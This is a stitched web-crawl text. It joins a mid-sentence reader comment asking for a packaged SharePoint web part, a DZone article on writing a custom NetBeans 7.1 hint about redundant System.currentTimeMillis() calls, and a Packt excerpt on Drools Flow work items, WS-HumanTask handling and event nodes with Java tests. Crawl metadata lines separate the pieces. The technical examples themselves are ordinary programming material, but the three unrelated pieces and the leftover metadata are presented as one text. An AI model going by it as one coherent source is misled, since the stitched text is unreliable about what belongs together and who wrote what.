like what I've been looking for since ages. Unfortunately I only have Office365's sharepoint, and no clue on how to create a new webpart from code (and no Visual Studio either). Could you please please please 🙂 supply the SP13 packaged version you were talking about? Thank you very much
https://blogs.msdn.microsoft.com/balsharfi/2012/01/01/an-alternative-archives-web-part-to-solve-the-pre-dated-posts-provisioning-in-the-ootb-blog-site-archives-web-part/
CC-MAIN-2016-44
refinedweb
2,444
65.73
Creating a NetBeans 7.1 Custom Hint Join the DZone community and get the full member experience.Join For Free I have talked about some of my favorite NetBeans hints in the posts Seven NetBeans Hints for Modernizing Java Code and Seven Indispensable NetBeans Java Hints. The fourteen hints covered in those two posts are a small fraction of the total number of hints that NetBeans supports "out of the box." However, even greater flexibility is available to the NetBeans user because NetBeans 7.1 makes it possible to write custom hints. I look at a simple example of this in this post. Geertjan Wielenga's post Custom Declarative Hints in NetBeans IDE 7.1 begins with coverage of NetBeans's "Inspect and Transform" (AKA "Inspect and Refactor") dialog, which is available from the "Refactor" menu (which in turn is available via the dropdown "Refactor" menu along the menu bar or via right-click in the NetBeans editor). The following screen snapshot shows how this looks. The "Inspect" field of the "Inspect and Transform" dialog allows the NetBeans user to tailor which project or file should be inspected. The "Use" portion of the "Inspect and Transform" dialog allows that NetBeans user to specify which hints to inspect for. In this case, I am inspecting using custom hints and I can see that by clicking on the "Manage" button and selecting the "Custom" checkbox. Note that if "Custom" is not an option when you first bring this up, you probably need to click the "New" button in the bottom left corner. When I click on "Manage" and check the "Custom" box, it expands and I can see the newly created "Inspection" hint. If I click on this name, I can rename it and do so in this case. The renamed inspection ("CurrentDateDoesNotNeedSystemCurrentMillis") is shown in the next screen snapshot. To create the hint and provide the description seen in the box, I can click on the "Edit Script" button. Doing so leads to the small editor window shown in the next screen snapshot. If more space is desired for editing the custom inspection/hint, the "Open in Editor" button will lead to the text being opened in the NetBeans text editor in which normal Java code and XML code is edited. With the custom inspection/hint in place, it's time to try it out on some Java code. The following code listing uses an extraneous call to System.currentTimeMillis() and passes its result to the java.util.Date single long argument constructor. This is unnecessary because Date's no-arguments constructor will automatically instantiate an instance of Date based on the current time (time now). RedundantSystemCurrentTimeMillis.java package dustin.examples; import static java.lang.System.out; import java.util.Date; /** * Simple class to demonstrate NetBeans custom hint. * * @author Dustin */ public class RedundantSystemCurrentTimeMillis { public static void main(final String[] arguments) { final Date date = new Date(System.currentTimeMillis()); out.println(date); } } The above code works properly, but could be more concise. When I tell NetBeans to associate my new inspection with this project in the "Inspect and Transform" dialog, NetBeans is able to flag this for me and recommend the fix. The next three screen snapshots demonstrate that NetBeans will flag the warning with the yellow light bulb icon and yellow underlining, will recommend the fix when I click on the light bulb, and implements the suggested fix when I select it. As the above has shown, a simple custom hint allows NetBeans to identify, flag, and fix at my request the unnecessary uses of System.curentTimeMillis(). I've written before that NetBeans's hints are so handy because they do in fact do three things for the Java developer: automatically flag areas for code improvement for the developer, often automatically fix the issue if so desired, and communicate better ways of writing Java. For the last benefit in this case, the existence of this custom hint helps convey to other Java developers a little more knowledge about the Date class and a better way to instantiate it when current date/time is desired.! / Oh No Utilities.loadImage!), and Jan Lahoda's jackpot30 Rules Language (covers the rules language syntax used by the custom inspections/hints and shown in the simple example above). The Refactoring with Inspect and Transform in the NetBeans IDE Java Editor tutorial also includes a section on managing custom hints. Hopefully, the addressing of Bug 210023 will help out with this situation. My example custom NetBeans hint works specifically with the Date class. An interesting and somewhat related StackOverflow thread asks if a NetBeans custom hint could be created to recommend use of Joda Time instead of Date or Calendar. A response on that thread refers to the NetBeans Java Hint Module Tutorial. Looking over that tutorial reminds me that the approach outlined in this post and available in NetBeans 7.1 is certainly improved and easier to use. Incidentally, a hint like that asked for in the referenced StackOverflow thread is easy to write in NetBeans 7.1. There is no transform in this example because a change of the Date class to a Joda Time class would likely require more changes in the code than the simple transform could handle. This hint therefore becomes one that simply recommends changing to Joda Time. The next screen snapshots show the simple hint and how they appear in the NetBeans editor. Each release of NetBeans seems to add more useful hints to the already large number of helpful hints that NetBeans supports. However, it is impossible for the NetBeans developers to add every hint that every team or project might want. Furthermore, it is not desirable to have every possible hint that every community member might come up with added to the IDE. For this reason, the ability to specify custom hints in NetBeans and the ability to apply those hints selectively to projects and files are both highly desirable capabilities. Published at DZone with permission of Dustin Marx, DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/creating-netbeans-71-custom
CC-MAIN-2022-27
refinedweb
1,015
53.71
Write your own JWT generator in Python I have written about JWTs before. If you are not familiar with them you might start by taking a look at my article on Understanding JWTs and also my piece on Python keywords, as I revisited JWTs there too. So, assuming you are familiar with those articles, I will dive straight into it. The problem I do a lot of generating JWTs on the command line and it was a pain specifying things like Application IDs, user names and ACLs on the command line. I wanted a simple file in my project directory where I could set the information once, and then use that file to generate JWTs as required. That's it! Here's what a sample file, .jwt, might look like for a typical project: APP_ID="7ffb050a-121e-4a67-94b8-8301a7e4163d" PRIVATE_KEY_FILE="private.key" # 24 hrs EXPIRY=86400 # For Client SDK tokens to authenticate users only SUB=<username> ACL='{"paths": {"/*/users/**": {},"/*/conversations/**": {},"/*/sessions/**": {},"/*/devices/**": {},"/*/image/**": {},"/*/media/**": {},"/*/applications/**": {},"/*/push/**": {},"/*/knocking/**": {}}}' Generally it's the APP_ID that you need to keep copying and pasting on the command line, so that's first in the file. By convention I store my private key in private.key. The other entries are optional, but I usually set a long expiry for testing. If you don't set this the default of 15 minutes is used. Env file format The .jwt file is slightly special in that it is actually an environment file. Typically your environment file is .env. I don't use that name as many of my projects already have a .env and typically I want to keep the JWT info separate. The great thing about environment files is Python has a library that makes dealing with them really easy. You pull in the library with from dotenv import load_dotenv. You then use calls like os.getenv("PRIVATE_KEY_FILE") to fetch the environment variable values. Claims I talked before about optional "claims" that a JWT might have. In the above example SUB and ACL are optional claims - they only make sense for me when testing Nexmo Client SDK apps. You could however happily add your own optional claims and they would be taking into account by the JWT generator automatically. The only exception to that is if a claim needed some additional processing or logic before being used that would need to be added in the code. An example of this is ACLs. If you look at valid ACLs for working with Nexmo Client SDK in jwt.io, you will see they are a JSON object. For this reason I have to convert this from a string in the .jwt file to a Python object with json.loads(). You then have a Python dictionary (print(type(payload['acl']))) and jwt.encode does the right thing. If your claims don't need special handling you can just add your claims to the .jwt file and away you go - check the code comment for the correct place to pass in your optional claims. The code Given what you already know about JWTs from my other articles you already have a head start in understanding the code. So I will go "full monty" and display it here: #!/usr/bin/env python3 import os import jwt import time from uuid import uuid4 from dotenv import load_dotenv import json def read_file(filename): f = open (filename, mode='r', encoding='utf-8') source = f.read() f.close() return source load_dotenv('.jwt') app_id = os.getenv("APP_ID") private_key_file = os.getenv("PRIVATE_KEY_FILE") private_key = read_file(private_key_file) exp = os.getenv("EXPIRY") sub = os.getenv("SUB") acl = os.getenv("ACL") def build_payload (application_id, **kwargs): payload = {} payload['application_id'] = application_id payload['iat'] = int(time.time()) payload['jti'] = str(uuid4()) if "exp" in kwargs: exp = kwargs.pop('exp') if exp: payload['exp'] = int(time.time()) + int(exp) else: payload['exp'] = int(time.time()) + (15*60) # default to 15 minutes for k in kwargs: if kwargs[k]: if k == 'acl': payload[k] = json.loads(kwargs[k]) # In jwt.io acl is JSON object in the valid JWT. else: payload[k] = kwargs[k] return payload payload = build_payload(app_id, exp=exp, sub=sub, acl=acl) # Add optional custom claims as required token = jwt.encode(payload, private_key, algorithm='RS256') j = token.decode(encoding='ascii') # Convert byte string to printable string print(j) Much of the code I have looked at in my previous articles, so it should be fairly self-explanatory with the comments. Note that when printing out the JWT it's actually a byte string after encoding, so you need to decode that for the real world using str.decode(). I use the ASCII encoding because ASCII chars should cover the range of chars in a JWT, as base64url encoded data is a string of characters that only contains a-z, A-Z, 0-9, - and _. Usage You can add the generator to your path. You can then run it in your project directory to generate JWTs based on the .jwt file in that project directory. If you require a custom version of the generator for a project you can just copy the program file to that project directory, customize the code, and run there. It's open source (MIT license) so you can do what you want with it. You can also generate JWTs from a shell script, and potentially set an environment variable to contain the JWT. This can make testing quite convenient. Things to do with the code - Create a web version! - Customize it to handle your own optional claims. GitHub repo The code is also available in my GitHub repo. I'm not completely happy with the code as it is, although things have been working quite nicely, so I expect the code in the repo will be improved when I get time.
https://tonys-notebook.com/articles/jwt-generator.html
CC-MAIN-2020-10
refinedweb
964
66.23
How to Make an Auto-brewing Coffee Maker Introduction: How to Make an Auto-brewing Coffee Maker Intro: For those mornings where you just need that coffee to be ready when you wake up, your Arduino Coffee maker will come to the rescue! This can be done with most coffee makers, but the one I used was a Keurig B-40, but the steps should be essentially the same for different brewers. Materials: -A coffee maker (preferably a cheap one) -Arduino (I used an Uno) -Wire -2 Relays (Or 1, if you only need to turn on the coffee maker for it to brew) -Clock module (DS1302 works fine) -5v power supply (I used an old phone charger) -Soldering Iron -Hot glue gun (or other strong adhesive) Step 1: Set Up Connections The first step is to dissemble your brewer. MAKE SURE IT IS UNPLUGGED!!! Your goal is to find the board or switch(es) that allow you to brew the coffee. For my Keurig, this was the panel on top. I used this () video to help me dissemble it. Sure enough wasn't easy. In general it should only involve a few screws. When you have the board or switch, you do not have to remove any components. Simply solder wires to either side of the button or switch you'd be using. I only needed two, for the power and 8oz brew buttons. Once these connections are soldered, you are ready to start putting things together. Step 2: Connecting Everything After connecting the wires to the buttons/switches you'll need, the rest of the process should be simpler. Of course, you want to power your arduino. For this, you do not want to give it the full AC current, but instead the gentle 5v from your power supply. For mine, I took a hammer and busted open an old phone charger I wasn't using. From there, I cut the power cable of my brewer, and stripped the wires. I soldered the original cables back together, but the wires on the power supply that connected to the wall, I soldered to the cables of the brewer. This means if I plug in the coffee maker, I get power to the brewer like normal, but I also get the 5v as if the supply was connected to the wall. The cables leading away from this can be connected to any GND connection and the Vin pins of the arduino. You now have power. Before actually connecting to Arduino, I recommend setting the clock with the steps below. To set the clock, you'll need to download an additional library for Arduino available here:... Import that into your Arduino libraries, then upload this code onto the device: #include <virtuabotixRTC.h> // Creation of the Real Time Clock Object //SCLK -> 6, I/O -> 7, CE -> 8 virtuabotixRTC myRTC(6, 7, 8); void setup() { myRTC.setDS1302Time(00, [minutes], [Hour in 24h], [Day of week (Sunday is 1)], [Month], [Day], [Year]); } void loop() { ; } Almost done! Now all you have to do is upload the attached code, and connect it all. Be sure to edit the brew times in the code, seen before the void setup(). If set to zero, the brewer will not brew on this day. As for the connections, for my arduino and brewer I had of course the Vcc on the clock, and the Vcc on both relays connected to 5V, the GND on the clock and the relays connected to arduino GND, the positive and negative terminals of the power adapter connected to Vin and GND respectively. As for outputs: (Specific to Keurig B40! Other brewers will be different) One relay should have the positive sides of pwr and 8oz brew connected to the middle, and the negative sides of both connected to either side. Power I had connected to the "Always on" side. The IN pin should be connected to pin 4 on the arduino if using the provided sketch. The other relay should have the switch connected to the middle and always on side, orientation is not overly important, as the relay is a mechanical device and doesn't conduct any of the voltage.The IN pin should be connected to pin 2 on the arduino if using the provided sketch. The clock is simple, it should be connected to pins 6,7, and 8, as explained in the comments of the sketch. Step 3: Makin' Coffeh! :D At this point, if all has been set up correctly, a test run is in order. Plugging in the brewer should also power the arduino board, which should cause the lights on the relays (provided they have them) to turn on, and you should definitely see the green light on the arduino light up. If all goes well, feel free to hot glue the relays, the clock, the arduino, and the power supply to the coffee maker, where you see fit. You now have a self-brewing coffee maker, assuming you have coffee in the brewer at all times, and there is water in it.. Smart idea! Thanks for shearig :) Great idea!
http://www.instructables.com/id/How-to-make-an-auto-brewing-coffee-maker/
CC-MAIN-2018-05
refinedweb
853
69.11
Opened 11 years ago Closed 11 years ago Last modified 10 years ago #1055 closed defect (fixed) Models should have better default __str__() and __repr__() methods Description Right now, the default __repr__() method as defined in the Model class (in django/core/meta/__init__.py) looks like: def __repr__(self): return '<%s object>' % self.__class__.__name__ I think we should have at least a __str__() definition and a better __repr__(), which includes at least the object id, so that when using the interactive interpreter, you can tell an object from another. Something like: def __str__(self): return '%s %s' % (self.__class__.__name__, self.id) def __repr__(self): return '<%s object ID=%s>' % (self.__class__.__name__, self.id) Change History (3) comment:1 Changed 11 years ago by comment:2 Changed 11 years ago by The annoying thing about <> -enclosed Python-style repr strings is that when inserting them in templates for debugging you must remember to escape them to actually see them on the page. comment:3 Changed 11 years ago by This was fixed a while back. П
https://code.djangoproject.com/ticket/1055
CC-MAIN-2017-13
refinedweb
179
56.89
Drools JBoss Rules 5.0 Developer's Guide — Save 50% Develop rules-based business logic using the Drools platform. Transfer Funds work item We'll now jump almost to the end of our process. After a loan is approved, we need a way of transferring the specified sum of money to customer's account. This can be done with rules, or even better, with pure Java as this task is procedural in nature. We'll create a custom work item so that we can easily reuse this functionality in other ruleflows. Note that if it was a once-off task, it would probably be better suited to an action node. The Transfer Funds node in the loan approval process is a custom work item. A new custom work item can be defined using the following four steps (We'll see how they are accomplished later on): - Create a work item definition. This will be used by the Eclipse ruleflow editor and by the ruleflow engine to set and get parameters. For example, the following is an extract from the default WorkDefinitions.conf file that comes with Drools. It describes 'Email' work definition. The configuration is written in MVEL. MVEL allows one to construct complex object graphs in a very concise format. This file contains a list of maps—List<map<string, Object>>. Each map defines properties of one work definition. The properties are: name, parameters (that this work item works with), displayName, icon, and customEditor (these last three are used when displaying the work item in the Eclipse ruleflow editor). A custom editor is opened after double-clicking on the ruleflow node." ] ] Code listing 13: Excerpt from the default WorkDefinitions.conf file. Work item's parameters property is a map of parameterName and its value wrappers. The value wrapper must implement the org.drools.process.core.datatype.DataType interface. - Register the work definitions with the knowledge base configuration. This will be shown in the next section. - Create a work item handler. This handler represents the actual behavior of a work item. It will be invoked whenever the ruleflow execution reaches this work item node. All of the handlers must extend the org.drools.runtime.process.WorkItemHandler interface. It defines two methods. One for executing the work item and another for aborting the work item. Drools comes with some default work item handler implementations, for example, a handler for sending emails: org.drools.process.workitem.email.EmailWorkItemHandler. This handler needs a working SMTP server. It must be set through the setConnection method before registering the work item handler with the work item manager (next step). Another default work item handler was shown in code listing 2 (in the first part)-SystemOutWorkItemHandler. - Register the work item handler with the work item manager. After reading this you may ask, why doesn't the work item definition also specify the handler? It is because a work item can have one or more work item handlers that can be used interchangeably. For example, in a test case, we may want to use a different work item handler than in production environment. We'll now follow this four-step process and create a Transfer Funds custom work item. Work item definition Our transfer funds work item will have three input parameters: source account, destination account, and the amount to transfer. Its definition is as follows: import org.drools.process.core.datatype.impl.type.ObjectDataType; [ [ "name" : "Transfer Funds", "parameters" : [ "Source Account" : new ObjectDataType("droolsbook.bank. model.Account"), "Destination Account" : new ObjectDataType("droolsbook.bank. model.Account"), "Amount" : new ObjectDataType("java.math.BigDecimal") ], "displayName" : "Transfer Funds", "icon" : "icons/transfer.gif" ] ] Code listing 14: Work item definition from the BankingWorkDefinitions.conf file. The Transfer Funds work item definition from the code above declares the usual properties. It doesn't have a custom editor as was the case with email work item. All of the parameters are of the ObjectDataType type. This is a wrapper that can wrap any type. In our case, we are wrapping Account and BigDecimal types. We've also specified an icon that will be displayed in the ruleflow's editor palette and in the ruleflow itself. The icon should be of the size 16x16 pixels. Work item registration First make sure that the BankingWorkDefinitions.conf file is on your classpath. We now have to tell Drools about our new work item. This can be done by creating a drools.rulebase.conf file with the following contents: drools.workDefinitions = WorkDefinitions.conf BankingWorkDefinitions.conf Code listing 15: Work item definition from the BankingWorkDefinitions.conf file (all in one one line). When Drools starts up, it scans the classpath for configuration files. Configuration specified in the drools.rulebase.conf file will override the default configuration. In this case, only the drools.workDefinitions setting is being overridden. We already know that the WorkDefinitions.conf file contains the default work items such as email and log. We want to keep those and just add ours. As can be seen from the code listing above, drools.workDefinitions settings accept list of configurations. They must be separated by a space. When we now open the ruleflow editor in Eclipse, the ruleflow palette should contain our new Transfer Funds work item. If you want to know more about the file based configuration resolution process, you can look into the org.drools.util.ChainedProperties class. Work item handler Next, we'll implement the work item handler. It must implement the org. drools.runtime.process.WorkItemHandler interface that defines two methods: executeWorkItem and abortWorkItem. The implementation is as follows: /** * work item handler responsible for transferring amount from * one account to another using bankingService.transfer method * input parameters: 'Source Account', 'Destination Account' * and 'Amount' */ public class TransferWorkItemHandler implements WorkItemHandler { BankingService bankingService; public void executeWorkItem(WorkItem workItem, WorkItemManager manager) { Account sourceAccount = (Account) workItem .getParameter("Source Account"); Account destinationAccount = (Account) workItem .getParameter("Destination Account"); BigDecimal sum = (BigDecimal) workItem .getParameter("Amount"); try { bankingService.transfer(sourceAccount, destinationAccount, sum); manager.completeWorkItem(workItem.getId(), null); } catch (Exception e) { e.printStackTrace(); manager.abortWorkItem(workItem.getId()); } } /** * does nothing as this work item cannot be aborted */ public void abortWorkItem(WorkItem workItem, WorkItemManager manager) { } Code listing 16: Work item handler (TransferWorkItemHandler.java file). The executeWorkItem method retrieves the three declared parameters and calls the bankingService.transfer method (the implementation of this method won't be shown). If all went OK, the manager is notified that this work item has been completed. It needs the ID of the work item and optionally a result parameter map. In our case, it is set to null. If an exception happens during the transfer, the manager is told to abort this work item. The abortWorkItem method on our handler doesn't do anything because this work item cannot be aborted. Please note that the work item handler must be thread-safe. Many ruleflow instances may reuse the same work item instance. Work item handler registration The transfer work item handler can be registered with a WorkItemManager as follows: TransferWorkItemHandler transferHandler = new TransferWorkItemHandler(); transferHandler.setBankingService(bankingService); session.getWorkItemManager().registerWorkItemHandler( "Transfer Funds", transferHandler); Code listing 17: TransferWorkItemHandler registration (DefaultLoanApprovalServiceTest.java file). A new instance of this handler is created and the banking service is set. Then it is registered with WorkItemManager in a session. Next, we need to 'connect' this work item into our ruleflow. This means set its parameters once it is executed. We need to set the source/destination account and the amount to be transferred. We'll use the in-parameter mappings of Transfer Funds to set these parameters. As we can see the Source Account is mapped to the loanSourceAccount ruleflow variable. The Destination Account ruleflow variable is set to the destination account of the loan and the Amount ruleflow variable is set to loan amount. Testing the transfer work item This test will verify that the Transfer Funds work item is correctly executed with all of the parameters set and that it calls the bankingService.transfer method with correct parameters. For this test, the bankingService service will be mocked with jMock library (jMock is a lightweight Mock object library for Java. More information can be found at). First, we need to set up the banking service mock object in the following manner: mockery = new JUnit4Mockery(); bankingService = mockery.mock(BankingService.class); Code listing 18: jMock setup of bankingService mock object (DefaultLoanApprovalServiceTest.java file). Next, we can write our test. We are expecting one invocation of the transfer method with loanSourceAccount and loan's destination and amount properties. Then the test will set up the transfer work item as in code listing 17, start the process, and approve the loan (more about this is discussed in the next section). The test also verifies that the Transfer Funds node has been executed. Test method's implementation is as follows: @Test public void transferFunds() { mockery.checking(new Expectations() { { one(bankingService).transfer(loanSourceAccount, loan.getDestinationAccount(), loan.getAmount()); } }); setUpTransferWorkItem(); setUpLowAmount(); startProcess(); approveLoan(); assertTrue(trackingProcessEventListener.isNodeTriggered( PROCESS_LOAN_APPROVAL, NODE_WORK_ITEM_TRANSFER)); } Code listing 19: Test for the Transfer Funds work item (DefaultLoanApprovalServiceTest.java file). The test should execute successfully. Human task Let's go back to the loan approval ruleflow. We've finished after the Rating? node.Our next step is to implement the Process Loan node. This is where the humanactors will be involved. We've done what we could with our automated process,now is the time for tasks that a computer can't or shouldn't do. Drools supports human tasks though Web Services Human Task specification (The WS-HumanTask is an OASIS specification and can be downloaded from). With this specification, we can define human tasks that will be automatically created when the ruleflow reaches this ruleflow node. After they are created, they will appear on the 'task list screen' of designated users than can 'claim' these tasks and start working on them until they are completed. They can also suspend or abort these tasks. Once the task reaches the final state (complete/abort), the ruleflow continues execution. Please note that this is a simplified view; the WS-HumanTask specification defines a more complex life cycle of a task. From the ruleflow perspective, WS-HumanTask is just a special case of work item. Once it is triggered, the ruleflow simply waits for the end result, be it success or failure. Drools comes with a simple work item handler implementation for human task called WSHumanTaskHandler. It is far from implementing all of the features of WS-HumanTask specification, but it gives us a starting point and a direction. Human task support is part of the drools-process-task module. The human task ruleflow node allows us to specify actorId, which is the ID of a person/group that will have the role of potentialOwner as defined by WS-HumanTask. Also, some comment can be specified, which will become the 'subject' and 'description' of a human task. If a task can be skipped then priority and option can be also defined. The WSHumanTaskHandler provides no support for some WS-HumanTask user roles such as task initiators, excluded owners, task stakeholders, business administrators or recipients. Nor does it support attachments, multiple comments, task delegations, start/end deadlines with their escalations, notifications, and user reassignments. If needed, the WSHumanTaskHandler can be extended to provide the features we need. For the purpose of our loan approval example, we'll use this WSHumanTaskHandler unchanged. The core part of the WS-HumanTask specification is the server that receives the tasks and manages them. WSHumanTaskHandler is kept lightweight. It is a simple client that creates a task based on properties set in the ruleflow and registers this task with the server together with a callback. As has been said earlier, it then waits for success or failure of the task. It can take some time for a human task to finish; therefore, a more advanced implementation could, for example, persist the ruleflow to some permanent storage in order to free up the resources. On the other side, the server is a more or less complete implementation of the WS-HumanTask specification. It goes even further by giving us the ability to send standard iCalendar VEVENT notifications (iCalendar is a RFC 2445 standard for calendar exchange. More information about iCalendar VEVENTs can be found at). Test for the human task So far it was only theory—a test will hopefully make it clearer. In order to write some tests for the Process Loan human task, we'll need a server that will receive these tasks. Other clients will then connect to this server and work on these tasks and when they are completed our ruleflow will be able to continue. Due to its size, the test will be divided into three parts—server setup, client setup, and client 'working on the task'. We'll start with the server setup (see the following code listing). It will initialize the server, register a human task work item handler, and start the loan approval process. @Test public void processLoan() throws Exception { EntityManagerFactory emf = Persistence .createEntityManagerFactory("org.drools.task"); TaskService taskService = new TaskService(emf, SystemEventListenerFactory.getSystemEventListener()); MockUserInfo userInfo = new MockUserInfo(); taskService.setUserinfo(userInfo); TaskServiceSession taskSession = taskService .createSession(); taskSession.addUser(new User("Administrator")); taskSession.addUser(new User("123")); taskSession.addUser(new User("456")); taskSession.addUser(new User("789")); MinaTaskServer server = new MinaTaskServer(taskService); Thread thread = new Thread(server); thread.start(); Thread.sleep(500); WorkItemHandler htHandler = new WSHumanTaskHandler(); session.getWorkItemManager().registerWorkItemHandler( "Human Task", htHandler); setUpLowAmount(); startProcess(); Code listing 20: Test for the Process Loan node—setup of server and process start-up (DefaultLoanApprovalServiceTest.java file). As part of the server setup, the test creates a JPA EntityManagerFactory (JPA stands for Java Persistence API. More information can be found at) from a persistence unit named org.drools.task (the configuration for this persistence unit is inside drools-process-task.jar module in /META-INF/persistence.xml. By default, it uses an in-memory database). It is used for persisting human tasks that are not currently needed. There may be thousands of human task instances running concurrently and each can take minutes, hours, days, or even months to finish. Persisting them will save us resources. Next, TaskService is created. It takes EntityManagerFactory and SystemEventListener. org.drools.SystemEventListener The SystemEventListener provides callback style logging of various Drools system events. The listener can be set through SystemEventListenerFactory. The default listener prints everything to the console. TaskService represents the main server process. A UserInfo object is set to taskService. It has methods for retrieving various information about users and groups of users in our organization that taskService needs (it is, for example, used when sending the iCalendar notifications). For testing purposes, we're using only a mock implementation—MockUserInfo. TaskService can be accessed by multiple threads. Next, TaskServiceSession represents one session of this service. This session can be accessed by only one thread at a time. We use this session to create some test users. Our Process Loan task is initially assigned to actorIds: 123, 456, and 789. This is defined in the Process Loan ruleflow node's properties. Next, the server thread is started wrapped in a MinaTaskServer. It is a lightweight server implementation that listens on a port for clients requests. It is based on Apache MINA. (More information about Apache MINA can be found at). The current thread then sleeps for 500ms, so that the server thread has some time to initialize. Then a default Drools WSHumanTaskHandler is registered, a new loan application with low amount is created, and the ruleflow is started. The ruleflow will execute all the way down to Process Loan human task where the WSHumanTaskHandler takes over. It creates a task from the information specified in the Process Loan node and registers this task with the server. It knows how to connect to the server. The ruleflow then waits for the completion of this task. The next part of this test represents a client (bank employee) that is viewing his/her task list and getting one task. First, the client must connect to the server. Because all of the communication between the client and the server is asynchronous and we want to test it in one test method, we will use some blocking response handlers that will simply block until the response is available. These response handlers are from the drools-process-task module. Next, the client.getTasksAssignedAsPotentialOwner method is called and we wait for a list of tasks that the client can start working on. The test verifies that the list contains one task and that the status of this task is Ready. MinaTaskClient client = new MinaTaskClient("client 1", new TaskClientHandler( SystemEventListenerFactory.getSystemEventListener())); NioSocketConnector connector = new NioSocketConnector(); SocketAddress address = new InetSocketAddress("127.0.0.1", 9123); client.connect(connector, address); BlockingTaskSummaryResponseHandler summaryHandler = new BlockingTaskSummaryResponseHandler(); client.getTasksAssignedAsPotentialOwner("123", "en-UK", summaryHandler); List<TaskSummary> tasks = summaryHandler.getResults(); assertEquals(1, tasks.size()); TaskSummary task = tasks.get(0); assertEquals("Process Loan", task.getName()); assertEquals(3, task.getPriority()); assertEquals(Status.Ready, task.getStatus()); Code listing 21: Test for the Process Loan node—setup of a client and task list retrieval (DefaultLoanApprovalServiceTest.java file). The final part of this test represents a client (bank employee) that 'claims' one of the task from the task list, then 'starts' this task, and finally 'completes' this task. BlockingTaskOperationResponseHandler operationHandler = new BlockingTaskOperationResponseHandler(); client.claim(task.getId(), "123", operationHandler); operationHandler.waitTillDone(10000); operationHandler = new BlockingTaskOperationResponseHandler(); client.start(task.getId(), "123", operationHandler); operationHandler.waitTillDone(10000); operationHandler = new BlockingTaskOperationResponseHandler(); client.complete(task.getId(), "123", null, operationHandler); operationHandler.waitTillDone(10000); assertTrue(trackingProcessEventListener.isNodeTriggered( PROCESS_LOAN_APPROVAL, NODE_JOIN_PROCESS_LOAN)); } Code listing 22: Test for the Process Loan node—client is claiming, starting, and completing a task (DefaultLoanApprovalServiceTest.java file). After the task is completed, the test verifies that the ruleflow continues execution through the next join node. Final Approval As you may imagine, before any money is paid out to the loan requester, a final check is needed from a supervisor. This is represented in the ruleflow by the Approve Event node. It is an event node from the ruleflow palette. It allows a process to respond to the external events. This node has no incoming connections; in fact, the events can be created/signaled through the process instance's signalEvent method. The method needs event type and the event value itself. Parameters of the Event node include event type and variable name that hold this event. The variable must be itself declared as a ruleflow variable. Test for the 'Approve Event' node A test will show us how all this works. We'll setup a valid loan request. The dummy SystemOutWorkItemHandler will be used to get through the Transfer Funds and Process Loan work items. The execution should then wait for the approve event. Then we'll signal the event using the processInstance.signalEvent("LoanApprovedEvent", null) method and verify that the ruleflow finished successfully. @Test public void approveEventJoin() { setUpLowAmount(); startProcess(); assertEquals(ProcessInstance.STATE_ACTIVE, processInstance .getState()); assertFalse(trackingProcessEventListener.isNodeTriggered( PROCESS_LOAN_APPROVAL, NODE_WORK_ITEM_TRANSFER)); approveLoan(); assertTrue(trackingProcessEventListener.isNodeTriggered( PROCESS_LOAN_APPROVAL, NODE_WORK_ITEM_TRANSFER)); assertEquals(ProcessInstance.STATE_COMPLETED, processInstance.getState()); } Code listing 23: Test for the Approve Event node (DefaultLoanApprovalServiceTest.java file). Before sending the approved event, we've verified that the process is in active state and that the Transfer Funds work item hasn't been called yet. After sending the approved event, the test verifies that the Transfer Funds work item was actually executed and the ruleflow reached its final COMPLETED state. Banking service The final step is to implement the approveLoan service that represents the interface to our loan approval process. It ties everything that we've done together. The approveLoan method takes a Loan and a Customer, which is requesting the loan. KnowledgeBase knowledgeBase; Account loanSourceAccount; /** * runs the loan approval process for a specified * customer's loan */ public void approveLoan(Loan loan, Customer customer) { StatefulKnowledgeSession session = knowledgeBase .newStatefulKnowledgeSession(); try { //TODO: register workitem/human task handlers Map<String, Object> parameterMap = new HashMap<String, Object>(); parameterMap.put("loanSourceAccount",loanSourceAccount); parameterMap.put("customer", customer); parameterMap.put("loan", loan); session.insert(loan); session.insert(customer); ProcessInstance processInstance = session.startProcess("loanApproval", parameterMap); session.insert(processInstance); session.fireAllRules(); } finally { session.dispose(); } } Code listing 24: approveLoan service method of BankingService (DefaultLoanApprovalService.java file). The service creates a new session. It should then set-up and register all of the work item handlers that we've implemented. This part is left out. Normally, it would involve setting up configuration parameters such as the IP address of a SMTP server for the email work item handler and so on. Next, the loan and the customer are inserted into the session, the ruleflow is started, and the rules are fired. When the ruleflow completes, the session is disposed. Please be aware that with this solution, the knowledge session is held in memory from the time when the ruleflow starts up to the time when it finishes. Disadvantages of a ruleflow A ruleflow may potentially do more work than it should do. This is a direct consequence of how the algorithm behind Drools works. All of the rule constraints are evaluated at fact insertion time. For example, if we have a ruleflow with many nodes and 80% of the time the ruleflow finishes at the second node, most of the computation is wasted. Another disadvantage is that the business logic is now spread across at least two places. The rules are still in the .drl file; however, the ruleflow is in the .rf file. The ruleflow file also contains split node conditions and actions. If somebody wants to get the full understanding of a process, he/she has to look back and forth between these files. This may be fixed in future by having better integration in the Drools Eclipse plugin between the .drl file editor and the .rf file editor (for example, it would be nice to see the rules that belong to a selected ruleflow group). Summary We've designed a loan approval service that involves validation of the loan request, customer rating calculation(in the first part), approval events from a supervisor, and finally, custom domain specific work item for transferring money between accounts. We've seen Drools Flow support of human tasks through the WS-HumanTask specification. This allows for greater interoperability between systems from different vendors. All in all, Drools Flow represents an interesting approach to rules and processes. If you have read this article you may be interested to view : - Drools JBoss Rules 5.0 Flow (Part 1) - Human-readable Rules with Drools JBoss Rules 5.0(Part 1) - Human-readable Rules with Drools JBoss Rules 5.0(Part 2) About the Author : Michal Bali Michal Bali, freelance software developer, has more than 8 years of experience working with Drools and has an extensive knowledge of Java, JEE. He designed and implemented several systems for a major dental insurance company. He is an active member of the Drools community and can be contacted at michalbali@gmail.com. Post new comment
http://www.packtpub.com/article/drools-jboss-rules-5.0-flow-part2
CC-MAIN-2013-48
refinedweb
3,797
50.53
